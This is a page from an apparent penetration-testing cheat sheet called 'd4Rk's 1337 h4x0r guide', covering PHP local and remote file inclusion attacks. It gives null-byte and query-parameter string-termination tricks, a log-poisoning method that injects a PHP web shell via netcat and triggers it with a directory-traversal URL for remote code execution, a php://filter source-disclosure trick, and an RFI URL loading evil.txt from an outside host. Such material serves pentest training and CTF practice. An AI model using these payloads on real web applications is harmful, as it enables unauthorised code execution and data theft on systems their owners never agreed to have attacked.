d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • PHP settings
  • String termination
  • 1. Null byte poisoning
  • 2. Query parameter
  • Local File Inclusion (LFI)
  • Log file poisoning
  • Read source files
  • Remote File Inclusion (RFI)
Edit on GitHub
  1. Exploitation
  2. Web

File inclusions (LFI, RFI)

PreviousCross site scripting (XSS)NextDirectory traversal

Last updated 2 years ago

A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time.

--

PHP settings

  • allow_url_include

  • allow_url_fopen

String termination

Example:

include("path/ + $GET_['FILE] + ".php);

If we want to get rid of the enforced .php extension, we must terminate the string before. Following two ways may let you achieve exactly that.

1. Null byte poisoning

Terminate string with a null byte: %00 (PHP < 5.3.4).

filename.txt%00

2. Query parameter

Add a query parameter.

filename.txt?bla=

Above example then becomes path/filename.txt?bla=.php, the query parameter is ignored and the file is loaded as desired.

Local File Inclusion (LFI)

Log file poisoning

If requests are written to a log file and you are able to let a php script read and interpret those logs (LFI) you may even be able to gain remote code execution (RCE).

Example

Connect to the target.

nc -nv <ip> <port>

Write some php, that gets written into a log file.

<?php echo shell_exec($_GET['cmd']); ?>

Exploit an LFI to gain RCE.

http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Read source files

Use php filter and base64 encoding to bypass php execution and retrieve the source code.

php://filter/convert.base64encode/resource=<file>

Remote File Inclusion (RFI)

http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00

See also .

Wikipedia
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
PHP Sicherheit: Local & Remote File Inclusion - Webmaster Tipps
Directory traversal